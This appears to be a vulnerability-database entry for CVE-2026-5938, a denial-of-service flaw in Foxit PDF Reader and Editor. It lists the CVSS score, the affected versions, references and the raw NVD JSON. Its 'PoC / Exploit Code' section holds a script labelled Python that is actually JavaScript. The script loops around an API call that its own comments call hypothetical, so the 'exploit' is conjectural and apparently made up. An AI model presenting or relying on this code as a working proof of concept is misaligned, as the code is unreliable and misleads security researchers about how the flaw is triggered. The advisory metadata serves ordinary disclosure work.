CVE-2026-5938

Description

Improper control flow management allows a crafted document action chain to cause modal dialog reentry on the main thread, resulting in UI freeze and denial of service.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:foxit:pdf_reader:*:*:*:*:*:*:*:* - VULNERABLE

Foxit PDF Reader (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Conceptual PoC for CVE-2026-5938
// Embedded in a PDF document action (e.g., OpenAction)

function exploit() {
    try {
        // Attempt to trigger a modal dialog
        app.alert('Initial Dialog');
        
        // Crafted action chain attempting re-entry
        // This simulates a loop or recursive call that forces the UI thread to block
        var count = 0;
        while (count < 10000) {
            // Hypothetical API call that triggers internal UI event processing
            // leading to re-entry into the dialog manager
            this.syncAnnotScan(); 
            count++;
        }
        
        app.alert('This may not be reached if UI freezes');
    } catch (e) {
        console.println('Exception: ' + e);
    }
}

exploit();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5938
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5938
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5938/
[4] VulDB https://vuldb.com/cve/CVE-2026-5938
[5] https://www.foxit.com/support/security-bulletins.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5938", "sourceIdentifier": "14984358-7092-470d-8f34-ade47a7658a2", "published": "2026-04-27T12:16:24.153", "lastModified": "2026-04-29T17:29:29.233", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper control flow management allows a crafted document action chain to cause modal dialog reentry on the main thread, resulting in UI freeze and denial of service."}], "metrics": {"cvssMetricV31": [{"source": "14984358-7092-470d-8f34-ade47a7658a2", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "14984358-7092-470d-8f34-ade47a7658a2", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-691"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.2.4", "matchCriteriaId": "388A59F0-28A7-436B-BC75-C77E58F4ECDE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0.0", "versionEndExcluding": "14.0.4", "matchCriteriaId": "6C4B8779-474C-43FC-B02E-3754BFAB2432"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.0.0", "versionEndExcluding": "2026.1.1", "matchCriteriaId": "D3D204C5-D29B-4341-B48E-6F634E41126E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_reader:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.1.1", "matchCriteriaId": "C18DA4A1-62E6-4734-840D-B5280B765A9E"}]}]}], "references": [{"url": "https://www.foxit.com/support/security-bulletins.html", "source": "14984358-7092-470d-8f34-ade47a7658a2", "tags": ["Vendor Advisory"]}]}}